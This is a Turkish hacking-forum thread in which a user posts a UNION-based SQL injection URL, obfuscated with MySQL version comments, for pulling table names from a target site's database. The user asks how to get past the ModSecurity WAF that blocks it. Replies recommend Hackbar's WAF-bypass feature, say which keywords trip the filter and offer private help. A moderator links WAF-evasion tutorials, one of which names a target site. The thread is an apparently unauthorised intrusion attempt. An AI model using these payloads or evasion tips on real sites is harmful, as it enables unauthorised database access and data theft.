Tabloları çekerken WAF a takıldım

KontraTC

KontraTC

Katılımcı Üye
16 Ağu 2023
298
58
https:/site.org/gallery.php?cat_id=-1'+/*!50000UNION*/+/*!50000SELECT*/+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7378686577646d795f6d61696e)--+-


şeklinde tabloları çekmeye çalıştığımda

Not Acceptable!​

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.


WAF a takılıyorum aynı şeyi database çekerkende yaşadım ama bunu geçemiyorum ne yapmalıyım ?
 
Tarihe göre sırala Oylara göre sırala
SecurityFaTHeR

SecurityFaTHeR

Uzman üye
4 Şub 2022
1,317
358
KontraTC' Alıntı:
https:/site.org/gallery.php?cat_id=-1'+/*!50000UNION*/+/*!50000SELECT*/+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7378686577646d795f6d61696e)--+-


şeklinde tabloları çekmeye çalıştığımda

Not Acceptable!​

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.


WAF a takılıyorum aynı şeyi database çekerkende yaşadım ama bunu geçemiyorum ne yapmalıyım ?
Genişletmek için tıkla ...
Hackbar kullanıyorsan orada "DIOS" yazan birşey var orada dhani waf bypass olacaktır o sorununu çözer ama elle yapacağım diyorsan bu video işini görür:



(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7378686577646d795f6d61696e)--+-" bu payloaddaki sıkıntı information_schema ve where yüzünden wafa takılıyorsun onlarıda bypass et eğer olmazsa yazabilirsin dm den.
 
Oyla 0 Downvote
KontraTC

KontraTC

Katılımcı Üye
16 Ağu 2023
298
58
SecurityFaTHeR' Alıntı:
Hackbar kullanıyorsan orada "DIOS" yazan birşey var orada dhani waf bypass olacaktır o sorununu çözer ama elle yapacağım diyorsan bu video işini görür:



(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x7378686577646d795f6d61696e)--+-" bu payloaddaki sıkıntı information_schema ve where yüzünden wafa takılıyorsun onlarıda bypass et eğer olmazsa yazabilirsin dm den.
Genişletmek için tıkla ...
evet hackbar kullanıyorum ama dhani waf bypass işime yaramadı manuelden devam edeceğim
 
Oyla 0 Downvote
Lihtg

Lihtg

Moderatör
15 Mar 2022
1,957
837
lihtgTHT.php
Aşağıdaki kaynaklar işinize yarayacaktır. İyi forumlar.

SQLMap Aracı #2 - Waf Atlatmak

Merhabalar Ben LordSUCCESS, Bugünkü konumuz SQLMap Aracında Nasıl Waf Atlatırız Waf Nedir? WAF, "Web Application Firewall" kelimelerinin kısaltmasıdır. Web uygulamalarını korumak için kullanılan bir güvenlik önlemidir. WAF, web uygulamalarına gelen istekleri denetler ve kötü niyetli...
www.turkhackteam.org www.turkhackteam.org

Manuel Sql injection #1 (Bypass)

Merhaba arkadaşlar bu gün sizlere Manuel Sql injectıon-dan bahsedeceğim. Öncelikle şunu belirtiğim ki "sqlmap ve ya havji" ıle sql acıklı site database,tablolarına erişim sagladıkta sıtede "WAF GÜVENLIK DUVARI" ile rastlanıyoruz. Bu yüzden sızlere Manuel sql injectıonu bilmenızı tavsıye ederim...
www.turkhackteam.org www.turkhackteam.org

Manuel SQL İnjection Waf Denemeleri #2

Merhaba Arkadaşlar basitten zora doğru bulduğum siteler de manuel SQL injection yaparak waf bypass nasıl geçelecegini seri olarak yapıcaz demiştik buda serinin 2'ncisi olarak devam ediyoruz. Hedef site: http://caap.aero/n.php?id=8 Bu konumuzda Kolon sayılarını bulmayı geçiyorum. Bir önceki...
www.turkhackteam.org www.turkhackteam.org
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.